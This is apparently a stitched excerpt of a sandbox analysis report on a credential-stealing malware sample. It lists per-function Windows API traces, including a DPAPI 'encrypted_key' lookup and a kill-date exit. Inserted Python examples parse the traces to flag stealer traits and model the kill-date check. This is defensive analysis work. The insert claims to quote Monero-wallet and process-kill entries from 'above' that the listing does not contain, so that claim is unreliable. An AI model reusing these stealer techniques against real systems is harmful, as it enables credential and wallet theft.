                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 2183aeae932bdc213550c95d485e9e52394ed17e3f8d3fb5d2a3cab5b67261f3
                                  • Instruction ID: 22a65c44429c8edbf498f895e436321e0ae4369ef98bac4d7b8785a310be91d8
                                  • Opcode Fuzzy Hash: 2183aeae932bdc213550c95d485e9e52394ed17e3f8d3fb5d2a3cab5b67261f3
                                  • Instruction Fuzzy Hash: 6301B1B1601214AFE7205B209C8DFEA77BCEB08751F404590FA09D20C0EF708E908BA1
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 008E717E
                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 008E71B9
                                  • HeapAlloc.KERNEL32(00000000), ref: 008E71C0
                                  • memcpy.MSVCRT(00000000,?), ref: 008E71ED
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 008E7203
                                  • HeapFree.KERNEL32(00000000), ref: 008E720A
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 008E7269
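Three of the function summaries above are API sequences that a triage script can pick out of this listing mechanically: the RegOpenKeyExA/RegQueryValueExA pair on SOFTWARE\monero-project\monero-core, value wallet_path (ref 008E1039/008E1053); the CreateToolhelp32Snapshot, Process32Next, OpenProcess with desired access 00000001 (PROCESS_TERMINATE), TerminateProcess loop (00904779 to 009047CB); and the LoadLibraryA followed by GetProcAddress resolver with the heap-copied name in between (008E717E, 008E7269). The Python below is an added example and not part of the report or of the sample: it parses the report's own "APIs" bullet format and applies those three checks. The excerpt embedded in it is copied from the entries above; the rule names and the `WALLET_KEY_PATTERNS` watchlist are this example's own choices.

```python
import re

# Constructed input: three of the report's "APIs" entries, copied verbatim in
# the listing's own format (one "APIs" header per function).
SAMPLE_REPORT = """\
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E1015
• HeapAlloc.KERNEL32(00000000), ref: 008E101C
• RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\\monero-project\\monero-core,00000000,00020119,?), ref: 008E1039
• RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008E1053
• RegCloseKey.ADVAPI32(?), ref: 008E105D
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00904779
• Process32First.KERNEL32(00000000,00000128), ref: 00904789
• Process32Next.KERNEL32(00000000,00000128), ref: 0090479B
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 009047BC
• TerminateProcess.KERNEL32(00000000,00000000), ref: 009047CB
• CloseHandle.KERNEL32(00000000), ref: 009047D2
APIs
• LoadLibraryA.KERNEL32(?), ref: 008E717E
• memcpy.MSVCRT(00000000,?), ref: 008E71ED
• GetProcAddress.KERNEL32(00000000,?), ref: 008E7269
"""

# One bullet line: optional "Part of subcall function XXXX:" prefix, then
# Api.MODULE, optional "(args)," and the "ref: address" suffix.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

PROCESS_TERMINATE = 0x0001
# Watchlist for wallet-related registry paths; hypothetical, extend as needed.
WALLET_KEY_PATTERNS = (re.compile(r"monero", re.I),)


def parse_functions(text):
    """Return one list per function; entries are (api, module, args, ref)."""
    functions = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            functions.append([])
            continue
        m = CALL_RE.match(line)
        if not m or not functions:
            continue
        raw = m["args"]
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        functions[-1].append((m["api"], m["module"], args, int(m["ref"], 16)))
    return functions


def process_kill_loop(calls):
    """Toolhelp32 walk plus OpenProcess(PROCESS_TERMINATE) and TerminateProcess."""
    names = {api for api, _, _, _ in calls}
    if not {"CreateToolhelp32Snapshot", "Process32Next", "TerminateProcess"} <= names:
        return False
    for api, _, args, _ in calls:
        if api == "OpenProcess" and args and args[0] != "?":
            if int(args[0], 16) & PROCESS_TERMINATE:
                return True
    return False


def wallet_registry_read(calls):
    """First RegOpenKeyEx* argument matching the wallet watchlist, else None."""
    for api, _, args, _ in calls:
        if api.startswith("RegOpenKeyEx"):
            for a in args:
                if any(p.search(a) for p in WALLET_KEY_PATTERNS):
                    return a
    return None


def dynamic_api_resolution(calls):
    """LoadLibraryA resolved before GetProcAddress in the same function."""
    order = [api for api, _, _, _ in calls]
    if "LoadLibraryA" in order and "GetProcAddress" in order:
        return order.index("LoadLibraryA") < order.index("GetProcAddress")
    return False


def findings(text):
    out = []
    for i, calls in enumerate(parse_functions(text)):
        if process_kill_loop(calls):
            out.append((i, "process-kill-loop"))
        key = wallet_registry_read(calls)
        if key:
            out.append((i, "wallet-registry-read:" + key))
        if dynamic_api_resolution(calls):
            out.append((i, "dynamic-api-resolution"))
    return out


if __name__ == "__main__":
    for index, label in findings(SAMPLE_REPORT):
        print(f"function {index}: {label}")
```

The argument list is split on commas, which is enough for this listing but would mis-split an argument that itself contains a comma, and the `?` placeholder the report uses for an unresolved argument is never parsed as a number. The PROCESS_TERMINATE check on the desired-access mask is what separates a kill loop from a harmless process enumeration that opens handles with PROCESS_QUERY_INFORMATION.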
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AddressAllocFreeLibraryLoadProcmemcpy
                                  • String ID:
                                  • API String ID: 1745114167-0
                                  • Opcode ID: 0d97a1a1f8005e1f783ed1eb7cd4b3bc9ff20220ceb89c338efc1ac797cf3e2c
                                  • Instruction ID: 542fbda80988cac5323abba91a706afa93f78d1dbfe4594cce06161d98a3fb88
                                  • Opcode Fuzzy Hash: 0d97a1a1f8005e1f783ed1eb7cd4b3bc9ff20220ceb89c338efc1ac797cf3e2c
                                  • Instruction Fuzzy Hash: 5B415D717047469BEB20CFAADC84BAAB3E8FF89315F144569ED5EC7300E631E9108B50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 008E9D08
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 008E9D3A
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008E9D63
                                  • memcmp.MSVCRT(?,DPAPI,00000005), ref: 008E9D9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                   • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpymemcmp
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 4154055062-738592651
                                  • Opcode ID: cf714cba7f1881cb3ced06acaf857bd85199f2c99d071d06020312c083f1c661
                                  • Instruction ID: 931d5c082ed6783e604003bb51bc7ca161c71a1a008eed8bbccbd1cab87827b8
                                  • Opcode Fuzzy Hash: cf714cba7f1881cb3ced06acaf857bd85199f2c99d071d06020312c083f1c661
                                  • Instruction Fuzzy Hash: 85419C71E002A99BDB11EF6ACC81AAE7BB8FF42300F044065E994E7352DAB0ED05C791
                                  APIs
                                  • strtok_s.MSVCRT ref: 008F7F84
                                  • lstrlenA.KERNEL32(00000000), ref: 008F7FB1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008F7FE0
                                  • strtok_s.MSVCRT ref: 008F7FF1
                                  • StrCmpCA.SHLWAPI(00000000,009151F4), ref: 008F8025
                                  • StrCmpCA.SHLWAPI(00000000,009151F4), ref: 008F8053
                                  • StrCmpCA.SHLWAPI(00000000,009151F4), ref: 008F8087
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strtok_s$lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 348468850-0
                                  • Opcode ID: 05afbb27e1ac7e54b3eefe07839a16dc890b98e4ad4b3f4096fa70e26fe2e470
                                  • Instruction ID: 87508a65de20b5c0d45111201199651acac6aea0bd33c0f25576f147e4831e54
                                  • Opcode Fuzzy Hash: 05afbb27e1ac7e54b3eefe07839a16dc890b98e4ad4b3f4096fa70e26fe2e470
                                  • Instruction Fuzzy Hash: C2418D34A0451EDFDB20DF28D884EAE77B4FF85304B114099E905DB251EF71EA66CB91
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008F7DD8
                                    • Part of subcall function 0090A1F0: std::exception::exception.LIBCMT ref: 0090A205
                                    • Part of subcall function 0090A1F0: __CxxThrowException@8.LIBCMT ref: 0090A21A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008F7DF6
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008F7E11
                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,008F7CFA,00000000,?,?,00000000,?,008E91B6,?), ref: 008F7E74
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$Exception@8Throwmemcpystd::exception::exception
                                  • String ID: invalid string position$string too long
                                  • API String ID: 702443124-4289949731
                                  • Opcode ID: b3728a79a2337007b848087e94f17e98cadd0fc80f971aecd4ae7ec68bf1926a
                                  • Instruction ID: 889cf57c3270e6de45b6064e87d8a5bd6a6bea97825ff34fac18a7548845e585
                                  • Opcode Fuzzy Hash: b3728a79a2337007b848087e94f17e98cadd0fc80f971aecd4ae7ec68bf1926a
                                  • Instruction Fuzzy Hash: C02184323087088FE724DE7CD880A3AB7A5FF95B14B604A6EE556CB641D7619C4087A1
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,008E12EE), ref: 008E9AFA
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,008E12EE), ref: 008E9B10
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,008E12EE), ref: 008E9B27
                                  • ReadFile.KERNEL32(00000000,00000000,?,008E12EE,00000000,?,?,?,008E12EE), ref: 008E9B40
                                  • LocalFree.KERNEL32(?,?,?,?,008E12EE), ref: 008E9B60
                                  • CloseHandle.KERNEL32(00000000,?,?,?,008E12EE), ref: 008E9B67
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 958b8bc536ecb37bef67ea639ae3e70dc6619fd3380a9725c06bb30acfeee7cb
                                  • Instruction ID: d67bd1e9946b03749aa18229e3f17c3ec1e06e5af2878af3357aaa30540f02a6
                                  • Opcode Fuzzy Hash: 958b8bc536ecb37bef67ea639ae3e70dc6619fd3380a9725c06bb30acfeee7cb
                                  • Instruction Fuzzy Hash: 96118EB0600259AFE710DFA6EC88EBA736CFB45710F104119F914D7280EB70AD00CB64
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E89C6
                                    • Part of subcall function 0090A1F0: std::exception::exception.LIBCMT ref: 0090A205
                                    • Part of subcall function 0090A1F0: __CxxThrowException@8.LIBCMT ref: 0090A21A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E89FD
                                    • Part of subcall function 0090A1A3: std::exception::exception.LIBCMT ref: 0090A1B8
                                    • Part of subcall function 0090A1A3: __CxxThrowException@8.LIBCMT ref: 0090A1CD
                                  • memcpy.MSVCRT(?,00000000,?,00000000,?,?,008E8800,?,00000000,008E77D7), ref: 008E8A5B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$memcpy
                                  • String ID: invalid string position$string too long
                                  • API String ID: 2202983795-4289949731
                                  • Opcode ID: e31aa8246c6b38babc596043fd64b10a5c1377622b9aa3788f2c5cc189756a0b
                                  • Instruction ID: d2def972218f6033161da0b3dcd2b588833ae16d0c989b7e189b12342c82f8b6
                                  • Opcode Fuzzy Hash: e31aa8246c6b38babc596043fd64b10a5c1377622b9aa3788f2c5cc189756a0b
                                  • Instruction Fuzzy Hash: B321D872300694CBC720DA5DE840A6EF795FBA2761B11093FF159CB291DA71D841C3E6
                                  APIs
                                  • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00901E28), ref: 00901B52
                                    • Part of subcall function 00901800: lstrcpy.KERNEL32(00000000,0090D014), ref: 0090182F
                                    • Part of subcall function 00901800: lstrlenA.KERNEL32(010BFA80,00000000,00000000,?,?,00901B61), ref: 00901840
                                    • Part of subcall function 00901800: lstrcpy.KERNEL32(00000000,00000000), ref: 00901867
                                    • Part of subcall function 00901800: lstrcatA.KERNEL32(00000000,00000000), ref: 00901872
                                    • Part of subcall function 00901800: lstrcpy.KERNEL32(00000000,00000000), ref: 009018A1
                                    • Part of subcall function 00901800: lstrlenA.KERNEL32(00915558,?,?,00901B61), ref: 009018B3
                                    • Part of subcall function 00901800: lstrcpy.KERNEL32(00000000,00000000), ref: 009018D4
                                    • Part of subcall function 00901800: lstrcatA.KERNEL32(00000000,00915558,?,?,00901B61), ref: 009018E0
                                    • Part of subcall function 00901800: lstrcpy.KERNEL32(00000000,00000000), ref: 0090190F
                                  • sscanf.NTDLL ref: 00901B7A
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00901B96
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00901BA6
                                  • ExitProcess.KERNEL32 ref: 00901BC3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 3040284667-0
                                  • Opcode ID: 615fb037f5ec2a98e993e1c9532df58908440b03ef6fc55366767f12f186adb5
                                  • Instruction ID: 5ef840614413e6ca68e4e608549bb8a15d19570fc3da7345c1f54ede05aa4221
                                  • Opcode Fuzzy Hash: 615fb037f5ec2a98e993e1c9532df58908440b03ef6fc55366767f12f186adb5
                                  • Instruction Fuzzy Hash: 0721E4B1518341AF8340DF69D88489BBBF8EFC8314F408A1EF599C3264EB70D5048BA2
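Added example, not code from the report or the sample: read together, GetSystemTime, sscanf, two SystemTimeToFileTime calls and ExitProcess have the shape of a kill-date gate. A date string is parsed, both it and the current clock are converted to FILETIME so they compare as plain integers, and the process exits once the clock is past the date. The Python below reproduces that logic so an analyst can evaluate a recovered date against an arbitrary clock. The `YYYY-MM-DD` format is an assumption (the sscanf format string is not shown on this page), and raising on an unparsable string is this example's choice, since the page does not show the sample's failure path.

```python
import re
from datetime import datetime, timezone
from typing import Optional, Tuple

# FILETIME counts 100-nanosecond ticks since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000

# Assumed date format; the real sscanf format string is not recovered here.
DATE_RE = re.compile(r"^(\d{4})-(\d{2})-(\d{2})$")


def systemtime_to_filetime(year: int, month: int, day: int,
                           hour: int = 0, minute: int = 0, second: int = 0) -> int:
    """Pure-Python equivalent of SystemTimeToFileTime at whole-second resolution."""
    dt = datetime(year, month, day, hour, minute, second, tzinfo=timezone.utc)
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND


def parse_kill_date(text: str) -> Optional[Tuple[int, int, int]]:
    """sscanf stand-in: (year, month, day), or None when the format does not match."""
    m = DATE_RE.match(text.strip())
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3))


def would_exit(kill_date_text: str, now: Optional[datetime] = None) -> bool:
    """True when the clock is past the kill date, i.e. the sample would call ExitProcess.

    `now` is injectable so the gate can be evaluated against any clock, which is
    also why a sandbox whose clock is set before the date sees the full run.
    """
    parsed = parse_kill_date(kill_date_text)
    if parsed is None:
        # Example's choice: refuse rather than guess what the sample does on sscanf failure.
        raise ValueError(f"kill date {kill_date_text!r} does not match the assumed format")
    if now is None:
        now = datetime.now(timezone.utc)
    deadline = systemtime_to_filetime(*parsed)
    current = systemtime_to_filetime(now.year, now.month, now.day,
                                     now.hour, now.minute, now.second)
    return current > deadline


def would_exit_on(kill_date_text: str, year: int, month: int, day: int) -> bool:
    """Convenience wrapper: evaluate the gate as if the system clock read the given date."""
    return would_exit(kill_date_text, datetime(year, month, day, tzinfo=timezone.utc))
```

The FILETIME conversion is checked against the well-known Unix epoch value (116444736000000000 ticks), which is the quickest way to confirm a reimplementation before trusting any comparison built on it.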
                                  APIs
                                  • memcpy.MSVCRT(?,?,00000040), ref: 008E6E40
                                  • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 008E6E7C
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 008E6EB4
                                  • HeapAlloc.KERNEL32(00000000), ref: 008E6EBB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heapmemcpy$AllocProcess
                                  • String ID: @
                                  • API String ID: 1643994569-2766056989
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008F7D14
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008F7D2F
                                  • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,008E91B6,?,?,?,?,00000000,?,00001000,?), ref: 008F7D84
                                    • Part of subcall function 008F7DC0: std::_Xinvalid_argument.LIBCPMT ref: 008F7DD8
                                    • Part of subcall function 008F7DC0: std::_Xinvalid_argument.LIBCPMT ref: 008F7DF6
                                    • Part of subcall function 008F7DC0: std::_Xinvalid_argument.LIBCPMT ref: 008F7E11
                                    • Part of subcall function 008F7DC0: memcpy.MSVCRT(?,?,?,00000000,?,?,008F7CFA,00000000,?,?,00000000,?,008E91B6,?), ref: 008F7E74
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memcpy
                                  • String ID: string too long
                                  • API String ID: 2304785028-2556327735
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E88B3
                                    • Part of subcall function 0090A1A3: std::exception::exception.LIBCMT ref: 0090A1B8
                                    • Part of subcall function 0090A1A3: __CxxThrowException@8.LIBCMT ref: 0090A1CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2884196479-1517697755
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E8767
                                    • Part of subcall function 0090A1A3: std::exception::exception.LIBCMT ref: 0090A1B8
                                    • Part of subcall function 0090A1A3: __CxxThrowException@8.LIBCMT ref: 0090A1CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2884196479-1517697755
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E880C
                                  • memcpy.MSVCRT(?,?,00000000,00000000,008E77D7), ref: 008E8852
                                    • Part of subcall function 008E89B0: std::_Xinvalid_argument.LIBCPMT ref: 008E89C6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memcpy
                                  • String ID: string too long
                                  • API String ID: 2304785028-2556327735
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E8AA5
                                    • Part of subcall function 0090A1A3: std::exception::exception.LIBCMT ref: 0090A1B8
                                    • Part of subcall function 0090A1A3: __CxxThrowException@8.LIBCMT ref: 0090A1CD
                                  • memcpy.MSVCRT(?,?,?), ref: 008E8AEF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8ThrowXinvalid_argumentmemcpystd::_std::exception::exception
                                  • String ID: string too long
                                  • API String ID: 2475949303-2556327735
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E8BBF
                                    • Part of subcall function 0090A1F0: std::exception::exception.LIBCMT ref: 0090A205
                                    • Part of subcall function 0090A1F0: __CxxThrowException@8.LIBCMT ref: 0090A21A
                                  • memmove.MSVCRT(?,?,?,?,?,008E89E2,00000000,?,?,008E8800,?,00000000,008E77D7), ref: 008E8BF5
                                  Strings
                                  • invalid string position, xrefs: 008E8BBA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8ThrowXinvalid_argumentmemmovestd::_std::exception::exception
                                  • String ID: invalid string position
                                  • API String ID: 655285616-1799206989
                                  APIs
                                    • Part of subcall function 008E1510: lstrcpy.KERNEL32(00000000), ref: 008E152D
                                    • Part of subcall function 008E1510: lstrcpy.KERNEL32(00000000,?), ref: 008E154F
                                    • Part of subcall function 008E1510: lstrcpy.KERNEL32(00000000,?), ref: 008E1571
                                    • Part of subcall function 008E1510: lstrcpy.KERNEL32(00000000,?), ref: 008E1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E1437
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E1459
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E147B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E14DF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 00901581
                                  • lstrcpy.KERNEL32(00000000,?), ref: 009015B9
                                  • lstrcpy.KERNEL32(00000000,?), ref: 009015F1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00901629
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 1107cdf193ed9d13202bb45de3d3507e833618c820c6b5cb588c6a7c726d98d6
                                  • Instruction ID: 7e39fbc78407c0d11a948dba4ad1388046fa401fd27496cd1e71f308d66e6967
                                  • Opcode Fuzzy Hash: 1107cdf193ed9d13202bb45de3d3507e833618c820c6b5cb588c6a7c726d98d6
                                  • Instruction Fuzzy Hash: 2B21D7B4601B429FD724DF2AC858A17B7F9FF49700B044A2DA886CBB81DB70E851CB91
                                  APIs
                                  • memcpy.MSVCRT(?,?,00000040), ref: 008E6E40
                                  • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 008E6E7C
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 008E6EB4
                                  • HeapAlloc.KERNEL32(00000000), ref: 008E6EBB
